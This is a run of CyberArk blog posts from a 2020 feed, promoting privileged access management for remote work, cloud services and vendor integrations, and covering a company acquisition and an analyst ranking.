Assessments of these types of controls will provide you with a knowledge of the key areas where you need to focus your program, whether that means quick wins or longer term strategic plans, and will also provide intelligent information to feed either your existing mapping framework or your governance, risk management and compliance (GRC) tools. This will enable you to visually illustrate where you have controls in place, where they need to be strengthened and how they map to other industry or regulatory compliance requirements.

Figure 3. Example policy and controls table.

Understanding the state of your existing controls puts you in the risk driver’s seat. It allows you to demonstrate your remediation activities against your risk framework and alters the paradigm of having to rely on Audit to discover deficiencies, transforming the process into a sound governance model.

Design an Effective Reporting Framework

Developing executive reporting can be challenging as you balance the amount of data you produce with setting the right tone with the right message in your reports. It is essential that your reporting not only depicts progress, but also measures your achievements against your strategy and risk reduction against your framework. Your framework should also consider the audience you are reporting to – whether it is an executive oversight committee, PAM steering committee, Senior Leadership team, audit committees or the board of directors.

Generally, the reporting audience is interested in seeing material progress with the program: that it is on pace to achieve its objectives and is driving risk reduction aggressively. It is really a report that qualifies the investment in both resources and finances the organization has made towards the initiative.

The score card below (Figure 4) is an illustration of the program “at a glance,” providing a view of the PAM implementation strategy designed for CISOs and highlighting key areas of both progress and exposure. It measures accomplishments against a series of defined timelines and calls out risk levels based on a pre-established set of measures, typically defined by a CISO. At a glance, you can tell if projects are progressing and whether or not the current state of onboarding is operating within the risk tolerance levels.

Figure 4. PAM risk and implementation scorecard.

An effective reporting framework should provide measures that align to the progress of your program activities and your strategic framework. Amongst all the data, the complexities of your operating environment and the pervasive risks you are managing, it provides a simplified view into the state of health of your program.

Execute Your Reporting Strategy

Your reporting now becomes your narrative. It informs your leadership and oversight communities of the importance of the program, the progress achieved, issues that need to be managed and the level of risk mitigated as a result of the controls. The messages need to be succinct, concise and informative and will often need to be customized to the audience you are reporting to. Your reporting will be in the form of scorecards, dashboards, presentations and possibly open communications. The most important thing to remember is that your reporting sets the tone of your program. Understanding your audience, what they need to know and where they can help is fundamental to determining how you formalize your communications.

A wide variety of built-in reports – including inventory, entitlement and compliance reports – can be helpful in developing your scorecards and dashboards. Consider maximizing your time by leveraging automated processes to create your dashboards and scorecards. Exporting easily ingested data into other business analytics and intelligence tools, such as Splunk, Tableau and Power BI, is another best practice. Consider enriching the data with inputs from other inventory tools, entitlement databases and compliance reports for additional contextual awareness. Your reporting should also be capable of feeding your GRC tools so that the organization has a real-time view of the risk and control landscape. Use the tools that you have at your disposal and get the most from your existing technology investments.

When it comes to an effective reporting strategy, perception becomes your new reality. Make sure you understand the audience you are reporting to and that you provide meaningful, transparent and clear communications regarding your program that set the appropriate tone. If you don’t, your reporting committees will draw their own conclusions and they will define the narrative for you.

Secure Your Success as a Director of IAM

As the head of IAM, you are responsible for ensuring the appropriate controls are in place to protect and secure access to your firm’s most sensitive assets. Privileged access continues to be a prime target for nefarious characters and poses a significant threat if the controls are not operating effectively. This makes privileged access management a top business priority.

As a trusted advisor, CyberArk partners with IAM directors from around the world to secure and manage privileged access for organizations both large and small. Securing privileged access is instrumental in mitigating the risk of a cyber attack and maintaining business continuity. A successful PAM program is about more than just technology; it takes great people and well thought out processes to achieve optimal results.

CyberArk has the knowledge, resources and experience to make sure your PAM program is successful at every stage. Before you can report back the success of your PAM program, it’s critical that you get off on the right foot with a guided and prescriptive framework. Request a Blueprint session today or connect with your existing CyberArk account team to see how we can start securing your success today.

]]>
We All Have a Role to Play – We’re Committed to Ours. https://www.cyberark.com/blog/we-all-have-a-role-to-play-were-committed-to-ours/ Wed, 03 Jun 2020 17:48:52 +0000 https://www.cyberark.com/?p=93473

At CyberArk, we grieve the atrocity of George Floyd’s murder and unequivocally condemn all racial injustice, systematic inequality, and violence against innocent individuals.

I do not have the words to sufficiently express the complexity of the topics we are seeing raised or the history that precedes this boiling point. But America, and the world, has reached a clear turning point, and we all must use our voices to amplify our values.

While CyberArk has a zero-tolerance policy for racism, harassment and discrimination, we can do more to support our employees and communities. As an organization, we are actively working to better educate ourselves on issues of systemic inequality and committed to drive much-needed positive change wherever it is possible. While we cannot change the past, I am confident that together we can help shape a safer, more inclusive future.

]]>
Remote Work Survey: How Cyber Habits at Home Threaten Corporate Network Security https://www.cyberark.com/blog/remote-work-survey-how-cyber-habits-at-home-threaten-corporate-network-security/ Wed, 03 Jun 2020 13:00:20 +0000 https://www.cyberark.com/?p=93244

A new CyberArk survey of 3,000 remote office workers and IT professionals found that work-from-home habits – including password re-use and letting family members use corporate devices – are putting critical business systems and sensitive data at risk.

Here’s an infographic outlining the key findings:

The rush to onboard new applications and services that enable remote work, combined with insecure connections and dangerous security practices by employees, has significantly widened the attack surface, and security strategies need to be updated to match this new dynamic threat landscape. This is especially true when it comes to securing the privileged credentials of remote workers, which if compromised could open the door to an organization’s most critical systems and resources.

As more organizations extend work-from-home policies for the long term, it’s important to capture lessons learned from the initial phases of remote work and shape future cybersecurity strategies that don’t require employees to make tradeoffs that could put their company at risk.

Secure your success in this new normal; find out more about privileged access management.

]]>
PAM as a Service: It’s All a Matter of Trust https://www.cyberark.com/blog/pam-as-a-service-its-all-a-matter-of-trust/ Tue, 02 Jun 2020 13:59:23 +0000 https://www.cyberark.com/?p=93274 PAM as a Service

With shifting priorities and dynamic technology environments, IT security teams are looking for ways to cover the most ground while draining as few resources as possible. Privileged access management (PAM) continues to be a priority for many organizations as compromised privileged credentials are linked to nearly all attacks. Today, with cyber attackers targeting organizations as they invest in new tools and technologies to support remote work, many security leaders are struggling with how to prioritize new investments and how to get the most out of their existing budgets.

This is where PAM as a Service can help.

Deploying PAM as a Service can help reduce risk by locking down access to a company’s sensitive data, systems and applications – while optimizing resources. It also doesn’t require additional IT resources to manage on-premises infrastructure, perform upgrades, patches and more. Sounds great, right?

Before going down that path, though, it’s important to know what qualities are essential for a PAM as a Service solution you can trust.

SaaS solutions offer opportunities for companies to gain more control over their data, helping them understand how much data they have and where exactly it resides. While it is up to the organization to manage their own policies and users on the ground floor, any company looking to secure sensitive data, systems and applications on the cloud must trust the SaaS vendors that they’re handing the keys to.

Understand the security of the service. Frequently, businesses don’t investigate how exactly security vendors manage and safeguard customer data. They simply assume that everything is completely secure. The American Institute of Certified Public Accountants (AICPA) provides independent assessments – known as SOC 2 – to help organizations understand exactly how companies safeguard customer data and how well those controls are operating. These reports cover the principles of security, availability, confidentiality and privacy.

Most vendors whose cloud offerings are hosted on major cloud providers like AWS, Azure or GCP will tout SOC 2 Type 2 compliance, but verifying that the specific service in question has actually passed this check further demonstrates the vendor's commitment to security for its customers. This is an important check to make before trusting a SaaS provider to keep your data secure and private and to help ensure that the service will work how and when you need it to.

Know how data is stored and secured. This is a key component of SaaS itself and should be a major consideration. Data held by the service needs to be encrypted at rest, and communications from the cloud to corporate assets need to be encrypted in transit. Secure SSH tunnels from the cloud provider to customer-operated systems like Active Directory servers, SIEM servers and others ensure that traffic to those assets cannot be intercepted by malicious attackers.

Keep privileged account information safe. If privileged account information is going to be transmitted between the cloud and on-premises assets, investigate whether the cloud provider encrypts that network traffic so that it cannot be read by a third party, preventing illicit exfiltration of the information. The principle of least privilege should be applied whenever access is needed to upgrade backend systems or integrate new features: that access is denied by default and only permitted when essential.

Choose a cloud partner you can count on. Finally, the business stability of the vendor itself will show whether you have a partner in security that will be around for the long haul and able to keep up with rapidly changing demands of today’s IT world.  For SaaS, this is particularly relevant as cloud-first organizations change on the fly and need solutions that are secure and as nimble as they are.

To learn more about finding a privileged access management solution you can trust, join us June 19 at 12:00 PM ET for “A Service You Can Trust,” the final installment in the Friday 15 webinar series.

The Friday 15: All About PAM in 15 Minutes https://www.cyberark.com/blog/the-friday-15-all-about-pam-in-15-minutes/ Thu, 28 May 2020 19:55:51 +0000 https://www.cyberark.com/?p=93167 Privileged Access Management

As a security professional, you're busier than ever, juggling work, life and everything in between. With convenience being of the utmost importance to us these days, we are excited to launch The Friday 15. This webinar series will hit on top-of-mind cybersecurity issues – from prioritizing projects that can reduce the greatest amount of risk, to securing privileged access for employees working from home and managing machine and application users across digital initiatives – in 15-minute segments.

Check out the full lineup below and register today.

What Is Privileged Access Management (PAM) and Why Prioritize PAM as-a-Service?

Watch On Demand

As organizations accelerate digital transformation initiatives, the privilege-related attack surface is expanding at a rapid pace across machines, applications, cloud and hybrid environments, DevOps pipelines, Internet of Things (IoT) devices and more. One of the most proactive security steps an organization can take is to secure privileged access. In this Friday 15, we review different types of accounts, where they exist and how to fast track risk reduction with PAM as-a-Service.

Get Started with PAM

May 29 at 12:00 p.m. ET and 17:00 GMT

You know PAM is essential to proactively reducing risk in your IT environment, but you need some help in turning your security vision into reality. In this Friday 15, we’ll outline a phased, risk-based approach for securing privileged access across on-premises, hybrid and cloud environments. This proven approach can also help future-proof your business as you embrace robotic process automation, DevOps and other digital technologies.

Secure Access for Human Users

June 5 at 12:00 p.m. ET and 17:00 GMT

Whether it’s a privileged user misusing their level of access or an attacker stealing privileged credentials from user workstations, having a PAM program in place to protect from these abuses is critical. Whether they’re working from home or the office or providing a third-party service, we’ll demonstrate a secure, balanced way to provide users with elevated privileged access when they need it to perform their jobs – without disrupting workflows.

Secure Access for Non-Human Users

June 12 at 12:00 p.m. ET and 17:00 GMT

For systems to work together, they have to access one another. That's why the number of machines and applications that require privileged access vastly exceeds the number of people in an organization. In this installment, you'll learn how to secure these machines and applications by removing hard-coded credentials and replacing them with dynamic, secure credentials and secrets.

A Service You Can Trust

June 19 at 12:00 p.m. ET and 17:00 GMT

A successful PAM program goes beyond just implementing a good product — it takes strategic planning across people, process and technology.  And we’re here to help. In this session, you’ll learn about selecting a PAM solution that provides security, availability and privacy.

Our “Friday 15” series makes it quick and easy for you to gain the must-have knowledge and information needed to successfully adopt or mature your PAM program. Just 15 minutes each Friday and you’re on your way!

Native, Interactive Login Aids Privileged Session Management https://www.cyberark.com/blog/native-interactive-login-aids-privileged-session-management/ Thu, 21 May 2020 23:22:01 +0000 https://www.cyberark.com/?p=92237 Privileged Session Management

We recently explored how native session management can help organizations secure workflows and protect privileged access while giving users the flexibility to work with their favorite applications and tools. As companies search for tools that provide optimal security without sacrificing operational efficiency, we’ve gotten a lot of interest around this topic.

Specifically, security teams want to know how native session management capabilities can provide full session isolation and monitoring for privileged users like system administrators. These users have access to powerful privileged accounts used to manage Windows and Linux-based systems. Cyber attackers are targeting them in earnest to shortcut the pathway to critical corporate assets.

The brief demo video below illustrates how the interactive login in CyberArk Privileged Session Manager makes it even easier for administrators to utilize CyberArk’s native SSH and Windows session management capabilities. Designed to help organizations bolster both security and user productivity, this feature is available in the CyberArk Privileged Access Security Solution and CyberArk Privilege Cloud, our privileged access management as-a-service offering.

Administrators can natively connect to Windows and Linux target systems directly from their desktop. Users provide details for their target systems via a native user interface, then use a drop-down menu to select their preferred tools, such as our native RDP or SSH proxies. This eliminates the need to pre-configure clients with full account details, accelerating native access and making life easier for administrators.

The interactive login enables organizations to establish a secure control point to prevent credential exposure and isolate critical assets from end users with transparent connections to the Windows and Linux target systems required to keep the business running.

Now, let’s see it in action:


This native experience is a clear, simplified way to facilitate the adoption of privileged session management, a critical element of any strong privileged access management (PAM) program. And by streamlining the process of connecting to both Windows and Linux target systems, we’re helping organizations empower their privileged users with demonstrable efficiency and user experience benefits.

Learn more by downloading our datasheet or exploring key workflow examples.

Accelerated Cloud Adoption Drives Security-as-a-Service https://www.cyberark.com/blog/cloud-opportunities-drive-security-as-a-service-adoption/ Thu, 14 May 2020 13:00:59 +0000 https://www.cyberark.com/?p=91319

The power of human connection has been highlighted during this dramatic shift in the way we live and work. From afar, families are sharing stories and laughter via video chats, co-workers are holding virtual happy hours, teachers are engaging students through remote learning and authors are leading online book clubs. Many of these important personal connections are made possible by the cloud.

The same is true for business. To quote the New York Times, "Cloud computing has become essential to home workers." Within days of stay-at-home orders around the world, organizations were up and running on cloud-based applications that rapidly enabled collaboration, communication and productivity for millions of remote workers. And, behind these tools, public cloud providers like AWS, Microsoft Azure and Google Cloud rose to the herculean task of scaling by orders of magnitude to deliver continuity and reliability.

While this moment in time may have fast-tracked many organizations’ plans to move workloads to the cloud – it also showed us what’s possible.  A new Instinet study reveals cloud services will become an even higher priority for 68% of CIOs.  As organizations and their employees consider a future in which remote team structures are the new norm, cloud migration is increasing by the day.

Meanwhile, The Wall Street Journal reports that since employees began remote work, some software providers running on major cloud platforms are seeing a “noticeable increase in interest in their products.” And it makes sense. Cloud-based software, or software-as-a-service (SaaS) applications – from business critical applications like ERP and CRM systems to collaboration tools like Zoom and Dropbox – can help organizations increase agility, empower employees and manage spending during uncertainty.

As-a-Service: Security’s New Normal

This accelerated journey to the cloud is also driving a parallel demand for scalable “as-a-service” security solutions that can protect remote workforces from cyber attacks, secure cloud workloads and mitigate the risk of damaging data breaches.

More than ever, organizations are looking for proven tools that:

  • Can be deployed quickly and easily
  • Offload availability and performance responsibilities from hard-working IT and security teams, while bridging the widening cybersecurity skills gap
  • Reduce up-front costs and flexibly scale as needs change over time
  • Empower remote workers to do their jobs without slowing them down
  • Achieve rapid time to value

Industry experts agree: companies that can extend their traditional security offerings to security-as-a-service (SecaaS) models delivering these benefits will be better positioned for the new normal.

Prioritize Privilege. Meet the Demands of the New Norm and the Cloud Threat Landscape.

Organizations clearly understand the need for strong cybersecurity and are quickly realizing the benefits of security-as-a-service. But, as companies migrate to the cloud, the attack surface also expands. This has led to a surge in cyber attacks and many companies are struggling to prioritize projects and tools that can best protect their people and business.

Sometimes, the best way to make those decisions is to think like a cyber attacker. Consider: If you were an external attacker or malicious insider looking to steal sensitive data, launch ransomware or use your infrastructure for illicit cryptomining, what would you do first?

If you’re like most cyber criminals out there, you’d go straight for the privileged accounts, credentials and secrets which would quickly allow you to gain access to an organization’s most valuable and sensitive information like intellectual property and PII. And it’s pretty easy for attackers to find them, since privileges exist everywhere.

Privileged access management (PAM) as-a-service solutions can help organizations fast-track risk reduction by implementing strong controls around their most sensitive assets. While the benefits of SaaS are appealing, organizations are also looking for PAM tools that tackle privileged access protection across the entire infrastructure – not just in cloud applications. This requires a consistent, integrated approach to securing, managing and monitoring privileged access wherever it exists. Ultimately, security teams need to apply the same policies used for on-premises applications and infrastructure to the cloud.

Whether you’re onboarding new cloud apps, working to secure your remote workforce or extending controls to new areas, PAM as-a-service can help you mitigate risk quickly and prioritize the ever-evolving needs of your business. Learn more about PAM-as-a-Service today.

The Time is Now: CyberArk Acquires Idaptive https://www.cyberark.com/blog/the-time-is-now-cyberark-acquires-idaptive/ Wed, 13 May 2020 10:49:22 +0000 https://www.cyberark.com/?p=91001

Today we announced the acquisition of Idaptive, a leading Santa Clara, California-based Identity as a Service (IDaaS) company. By bringing together the technology and expertise of CyberArk and Idaptive, we are setting out to deliver on SaaS innovation with the industry's only modern identity platform built with a security-first approach. This is an exciting day for our team, so I sat down with CyberArk Chairman and CEO Udi Mokady to get his thoughts on the news.

Tell us a bit more about Idaptive.

Idaptive has a great team who is passionate about delivering innovative solutions to better protect their customers. Idaptive’s portfolio – which includes Single Sign-On (SSO), Multi-Factor Authentication (MFA) and identity lifecycle management — starts with a Zero Trust model and utilizes powerful Artificial Intelligence (AI) to secure access to applications and endpoints through user verification, device validation and intelligently limiting access. The company has been recognized as a leader by the most prominent industry analyst firms and its solutions are trusted by approximately 500 well-known organizations across industries.

Why is this acquisition particularly meaningful now?

We believe that a traditional approach to managing identities and access is often not enough to prevent unauthorized activity. Users of all types – whether that be human, application or machine identities — are often provisioned with some form of privileged access. If not properly secured, these accounts create pathways for threat actors to execute increasingly targeted attacks and ultimately compromise an organization’s most critical systems and assets.

The time is now. This new reality requires a new kind of Identity Security platform – and together with Idaptive, we are answering that call.

How do you see Idaptive strengthening the CyberArk portfolio?

Together, CyberArk and Idaptive will offer customers a SaaS-delivered, AI-based, security-first approach to managing identities and reducing risk. This approach is differentiated by putting Privileged Access Management at its core; it is adaptive and context-aware, and it is architected on the principles of Zero Trust and least privilege.

This will extend our ability to manage and protect identities with various levels of privileges across hybrid and multi-cloud environments, enabling customers to improve their overall security posture, simplify operations, support business agility and address ever increasing and complex regulatory requirements.

What makes you most excited about Idaptive?

Of course, I am excited about how Idaptive is going to help us drive additional value for our customers and partners, but beyond that, Idaptive also brings with it an amazing and passionate team.  I am eager to bring their energy and commitment to define the future of Identity Security.

From day one, we’ve been committed to helping our customers improve their overall security posture and supporting the ability for our partners to grow and expand their business.  Merging the innovative technology and talents of the Idaptive team with that of CyberArk represents an exciting opportunity to deliver a differentiated, modern approach as we work to continually meet the ever-changing needs of the dynamic threat landscape.

For more information on the acquisition of Idaptive, please check out our website which includes today’s announcement.

4 Ways Privileged Access Management Secures Remote Workers https://www.cyberark.com/blog/four-ways-privileged-access-management-secures-remote-workers/ Tue, 12 May 2020 13:00:03 +0000 https://www.cyberark.com/?p=90719 Privileged Access Management (PAM)

Employees around the world are working hard to remain productive, but, as the mantra taking hold of the internet goes, “People are not working from home; they are at home during a crisis trying to work.” They are following 24/7 news. They are juggling a multitude of family obligations. They’re using personal devices and insecure home networks for both work and play. They are stressed and distracted. And, unfortunately, that means they are likely your organization’s weakest security link right now – especially those users requiring privileged access.

Privileged access is the gateway to an organization’s most valuable assets and is at the core of nearly every major data breach. One of the fastest, most effective ways to reduce risk across your remote workforce is to prioritize privileged access management (PAM).

For many employees, as they moved from the office to working out of their homes, their privileges changed to allow them to work more independently or handle new tasks. Without a strong plan for privileged access management in a time of crisis, it’s very easy for these new privileges to become new vulnerabilities for the company.

In a time of unprecedented change in the way we work, global economic uncertainty and relentless cyber threats, privileged access management matters today more than ever – here’s why:

  1. Protecting Against the Rising Insider Threat

We are all human and no one is perfect.  We all make mistakes – especially when it comes to security.  We save passwords in browsers, download unsanctioned apps or share sensitive files via collaboration tools.  While not malicious in and of itself, these activities can unintentionally put data and systems at risk.

Attackers are banking on the current chaos, targeting employees, contractors and other "trusted insiders" with a barrage of phishing and social engineering attacks. Successfully deceiving just one user is enough to kick off a full system compromise. Starting with access to an endpoint, an attacker can establish a foothold inside the organization, escalate privileges and masquerade as a privileged insider. If the compromised user already has privileged access to business-critical systems, as sysadmins, RPA administrators, IT help desk team members and executives often do, the attacker has hit the jackpot.

While most insider threats are accidental, times of significant change can also fuel malicious insider attacks. If privileged access has not been properly managed, it's easy for a disgruntled employee or financially motivated former contractor to use unrevoked credentials, which still look legitimate to the systems that accept them, to bypass security measures.

Privileged access management solutions that offer insider threat protection allow organizations to give people only the necessary levels of access to do their jobs, helping to ensure activities occurring across the distributed network aren’t malicious and, if they are, enable security operations teams to take quick action.

  2. Securing Cloud Environments as Usage Skyrockets

While almost all organizations are moving toward the cloud, studies show 68% of companies are accelerating this journey to empower remote workers.  And this makes sense for a number of reasons.  Software-as-a-service (SaaS) solutions provide fast, streamlined ways for employees to connect and collaborate, store information and get their jobs done. Further, scalable SaaS tools are helpful to overworked IT teams, since they’re easy to deploy, cost-effective and eliminate infrastructure headaches. It’s a win-win for everyone.

But as organizations deploy cloud services in record number, many are doing so without fully considering the potential security risks. In fact, a recent CyberArk survey found that less than half of businesses have a PAM strategy in place for securing privileges in the cloud.

Yet, privileged credentials and secrets exist across cloud resources. And where privileges exist, attackers will be there, working to exploit them. In the rush to get new or expanded cloud environments up and running, security teams cannot afford to double back and fix issues after cloud services are deployed.

A strong PAM strategy accounts for everywhere privileges live – from SaaS applications, cloud management consoles, custom-built applications and cloud infrastructure to endpoints and on-premises environments. This gives organizations a comprehensive view of privilege-related risk and drives efficiency through an integrated approach.

  3. Securing Employee Endpoints

With the rise in remote work, securing employee workstations is more important than ever. But with employees working from home offices with insecure “BYOD” devices on insecure home networks – and making little distinction between work and personal use – this can be easier said than done. After all, a remote worker on their home computer isn’t restricted in what they can download or where they can go – even if that leads them to accidentally execute malicious software while playing browser games.

Unfortunately, many companies are creating similar situations on their employee workstations as well. Giving remote workers local admin rights allows them to download and install programs, connect and install devices and access corporate systems and information without having to go through IT or security teams – all of which are the exact same privileges that make BYOD risky.

Furthermore, those local admin rights are extremely useful for cyber attackers looking to escalate privileges, making the remote workers higher value targets.

Privilege management – as part of a broader defense in depth strategy for endpoints – is essential for containing cyber attacks early in their lifecycle. PAM enables organizations to efficiently remove and manage local admin rights and enforce least privilege, provide flexible just-in-time access and enforce application control to keep remote workers productive and secure.

  4. Securing Supply Chains in the Face of Rising Risk

This time of change and disruption extends beyond your remote workforce, impacting every third party vendor, contractor, consultant and service provider in your supply chain.

In fact, 90% of organizations provide third-party vendors privileged access to critical internal systems to manage data, patch or upgrade systems and more. Yet these users are not managed by the organization, which makes them difficult to secure and control. Making matters worse, many of these third-party vendors are also working remotely from disparate locations, increasing the risk.

Traditionally, organizations have relied on VPNs and other legacy solutions to provide access. On top of not being able to provide the granular permissions required to properly secure this level of access, VPNs also require agents and passwords, which can add more work for already overburdened IT operations teams – and can slow users down. Innovations in PAM technology are helping organizations overcome these challenges by authenticating vendor users with biometrics and multifactor authentication (MFA). These approaches help organizations remove operational overhead, keep vendor workflows intact and improve overall cybersecurity.

Prioritizing Privileged Access Management Today

As we look toward the future of our "new normal" – which will likely include more permanent remote workers across organizations and their supply chains and the onboarding and maintenance of new applications and services – privileged access management is key to preventing costly security breaches in the future caused by lax security measures in the here and now.

Cyber attackers are persistent and prepared for the “long game” and security professionals need to have the same persistence.  Implementing a modern and comprehensive PAM strategy is a great place to start.

Secure your success in this new normal; find out more about privileged access management and securing workstations and remote access.

KuppingerCole Analysts Name CyberArk “the One to Beat” in Privileged Access Management https://www.cyberark.com/blog/kuppingercole-analysts-name-cyberark-the-one-to-beat-in-privileged-access-management/ Fri, 08 May 2020 13:40:47 +0000 https://www.cyberark.com/?p=90502 Privileged Access Management Leadership Compass

Today, independent analyst firm KuppingerCole Analysts released its 2020 “Leadership Compass: Privileged Access Management” report, naming CyberArk the Overall Leader. CyberArk has held this leadership position for five consecutive years in recognition of its consistent, demonstrated advantages over the other vendors evaluated for this report.

This Leadership Compass comes at an important time. With security teams and Identity and Access Management (IAM) leaders facing immediate challenges related to business continuity and enabling remote work, it’s important to consider the broader organizational implications of our “new normal.”

The sudden, but necessary, transformation of global workforces has dramatically expanded the corporate privilege-related attack surface. Previously unmanaged devices are connecting to networks, while a broad range of users, including IT administrators, developers and business users, require remote access.

Many of these users require privileged access to corporate resources to maintain critical activities like payroll, product development and testing, security ops and customer support.  Few companies have ever had to perform these operations in a continuous, remote setting.

These new workflows are unfortunately accompanied by a rapidly growing list of vulnerabilities that impact organizations, from exploitable vulnerabilities in communications and collaboration tools like Zoom and Microsoft Teams, to insecure VPNs and even the broad use of unsecured home WiFi networks. Attackers are well aware of the opportunities the crisis has created for them and are dramatically increasing the pace of their attacks accordingly.

Bottom line? The new remote workforce has resulted in the users of privileged accounts becoming more numerous and widespread than ever before, while the pathways to steal and exploit these powerful accounts have grown and become easier to exploit.

According to Paul Fisher, senior analyst at KuppingerCole Analysts, privileged access management has become one of the fastest growing areas of cyber security and risk management solutions. And that was before our world was turned upside down by COVID-19. Now, the need for privileged access management is greater than ever, and CyberArk is best positioned to help our customers prepare for what's next.

With continued investments in innovation across the CyberArk Privileged Access Security Solution, CyberArk delivers the most comprehensive offerings for modern infrastructure that enable business, reduce risk and improve operational efficiency.

According to KuppingerCole Analysts, CyberArk “has a commanding position in the market and remains the one to beat.” Want to work with the Leader? Download a complimentary copy of the 2020 KuppingerCole Privileged Access Management Leadership Compass report now.

To learn more about what sets CyberArk apart, visit here.

Reduce Risk with CyberArk and Rapid7 Integrations https://www.cyberark.com/blog/reduce-risk-with-cyberark-and-rapid7-integrations/ Tue, 05 May 2020 21:50:51 +0000 https://www.cyberark.com/?p=90491

It’s well-known in the world of cybersecurity that you can’t secure what you don’t know exists. With today’s evolving threat landscape, it’s never been more of a challenge or a necessity to be able to discover and manage all of the accounts and credentials used by administrators and applications to access critical applications, systems and data.

While no solitary solution can address every security threat, CyberArk and Rapid7 have been working together to make life much easier and more secure for organizations working to reduce risk in a dynamically changing world.  There are a number of out-of-the-box integrations between CyberArk and Rapid7 that can help organizations both reduce risk and ease the burden on operations teams.

1. Identify Unknown Assets. Using Rapid7’s Project Sonar, organizations can identify previously unknown assets associated with their domain names and public IP address ranges that are exposed to the public internet. Sonar scans interact with exposed endpoint services, collecting additional metadata such as SSL certificates, HTML links in HTTP responses, service banners and more.

Any DNS records found in the endpoint metadata are then resolved (along with records from domain registrars) to help ensure complete discovery. These newly discovered assets can be audited against CyberArk in order to prioritize endpoints that require privileged access and get those accounts and credentials onboarded to minimize risk.

2. Run Secure Vulnerability Assessments. With CyberArk and Rapid7 InsightVM, Rapid7’s vulnerability assessment solution, organizations can reliably and thoroughly collect data across the ecosystem, while InsightVM securely retrieves a randomized and secured credential directly from CyberArk’s encrypted repository.

CyberArk checks that InsightVM is authenticated before granting a key to access systems and scan the environment. Policies can be set to rotate the credentials automatically. Unearth assets throughout the environment with InsightVM and then apply account templates to normalize the data and input it into the CyberArk digital vault for management.

As an additional layer of security, after InsightVM performs a scan, each system is designated a risk score, which is calculated based on defined vulnerabilities, asset tags, PCI compliance and others. InsightVM checks back with CyberArk so that only appropriate technicians are able to access higher risk assets to prevent further exposure to vulnerable systems, which can lead to dangerous lateral movement.

3. Unify security data and detect potential misuse or anomalous activities. The integration of CyberArk with InsightIDR, Rapid7’s SIEM tool, is a popular way to raise awareness of potential risk and enable security teams to quickly take action.

CyberArk is able to query the active directory, network traffic and more, and continuously monitor privileged credentials and session activities. Because of this, it can send logs and alerts over to InsightIDR where it uses cloud-based log and event management and machine learning to provide a baseline for user behavior and alert the Security Operations Center of potential misuse.

Together, CyberArk and Rapid7 cover the full circle from discovery to remediation. Furthermore, both solutions can be deployed “as a service,” which helps organizations minimize the on-premises footprint and enables security and IT teams to minimize risk and avoid overwork.

Right now, with IT budgets suddenly called into focus and security teams asked to make do with the tools at their disposal, organizations need solutions that can raise awareness and reduce the attack surface while being operation-friendly and not requiring a complex set of integrations and implementations. CyberArk and Rapid7 provide just that.

Join us for a webinar on May 14 where we’ll cover in-depth the many ways in which CyberArk and Rapid7 work together to help your organization reduce risk.

]]>
FBI Warns of Major Spike in Cyber Attacks https://www.cyberark.com/blog/fbi-warns-of-major-spike-in-cyber-attacks/ Thu, 30 Apr 2020 13:00:47 +0000 https://www.cyberark.com/?p=90152

Domestic cyber criminals and nation-state attackers alike are capitalizing on this time of uncertainty – and remote workers are a prime target.

Tonya Ugoretz, deputy Assistant Director of the FBI Cyber Division, recently spoke at a virtual Aspen Institute event. Ugoretz described the situation best as a “collision of highly motivated cyber threat actors and an increase in opportunities.” In fact, the FBI’s Internet Crime Complaint Center (IC3) is currently receiving between 3,000 and 4,000 cybersecurity complaints daily – a massive jump from their normal average of 1,000.

Criminals are taking advantage of “enormously high public interest in information” on COVID-19, the status of government stimulus checks and updates on local community restrictions. Some are setting up fake domains claiming to sell personal protective equipment, masquerading as charities working to raise money for patients or offering fraudulent loans to the financially strained. Times like these present a lucrative opportunity for cyber criminals – and they know it.

A Common Attack Method Shines

Traditional phishing attack methods continue to be a popular first step in the cyber attack chain. With a legitimate-looking email disguising a malicious, virus-spreading link or attachment, the attacker can easily cast their bait. These attacks have come to present an increased threat to businesses – especially now.

In today’s environment, remote workers are increasingly using both personal and corporate devices to access corporate resources. While a company may have made the office computer as secure as it can, if the remote worker logs on with their home laptop, that doesn’t help. Even employer-owned devices may be more vulnerable at home as many workers will be connecting through unsecured Wi-Fi.

Furthermore, with the adjustment to working from home – whether that means setting up a laptop on the kitchen table or working with kids playing in the background – many newly remote workers are not at their most alert, which makes it easy for them to mistakenly click on the wrong link. Clicking on a phishing link gives the cyber attacker a foothold on that person’s workstation – from there they can gain access to the company network to accomplish their goals.

Who’s at Risk?

While there are plenty of nefarious individuals working to cash in on chaos for personal profit, many of today’s campaigns are driven by highly organized nation-state attackers with deep pockets. To help shine a light on some of their methods, the FBI and a group of federal agencies issued a public alert this month – noting that financial institutions and digital currency exchanges are particularly at risk as attackers develop and launch “increasingly sophisticated” malware tools in search of large payouts.

The FBI has also observed a spike in nation-state cryptojacking attacks where attackers compromise victim endpoints and steal computing resources to mine digital currency. Additionally, they warned of ransomware campaigns, some of which demand payment “under the guise of long-term paid consulting arrangements in order to ensure that no such future malicious cyber activity takes place.”

But the financial sector isn’t the only one at risk. Hospitals and healthcare organizations are “deeply under attack,” explained Ugoretz and her co-presenters. As evidenced by attacks on the World Health Organization (WHO), nation-states are particularly interested in gaining insights on the coronavirus to help inform their country’s own response. These attackers are also homing in on research institutions and biotechnology companies that have publicly touted their work in progressing treatments and a viable vaccine.

Prioritizing the Protection of Privileged Access

Whether targeting healthcare organizations, financial institutions or any number of other companies, there is one common thread. Attackers are looking for sensitive information they can exploit – and they are doing so by compromising endpoints, stealing credentials and escalating privileges in order to access their targets.

While attackers can ultimately accomplish their goals by targeting any endpoint, they often seek out those of privileged users (like system administrators working from home) who have access to sensitive assets and powerful systems. By stealing privileged credentials from these users, attackers can accelerate their efforts. After gaining legitimate access to company systems, attackers appear to be company employees and can move throughout the environment with ease to conduct reconnaissance and siphon off proprietary data.

Privileged access is the gateway to an organization’s most valuable assets and is at the core of nearly every major security breach today. With privileged access, motivated external attackers and malicious insiders alike can access network infrastructure and steal data. Without that access, attackers are severely limited in what they can accomplish.

That’s why protecting the pathway to critical resources with privileged access management (PAM) is so important. Organizations that have a strategy in place to manage and monitor privileged access, as well as detect and respond quickly to threats, are best positioned to defend against today’s targeted threats.

While there is no silver bullet to protect organizations from this surge in criminal activity, prioritizing privilege can dramatically reduce the business impact of an attack.

Interested in learning more about privileged access management? Check out this datasheet or join us for a demo.

]]>
Attackers on the Hunt for Exposed RDP Servers https://www.cyberark.com/blog/attackers-on-the-hunt-for-exposed-rdp-servers/ Tue, 28 Apr 2020 13:00:38 +0000 https://www.cyberark.com/?p=90094 Privileged Access Management and Remote Desktop Protocol (RDP)

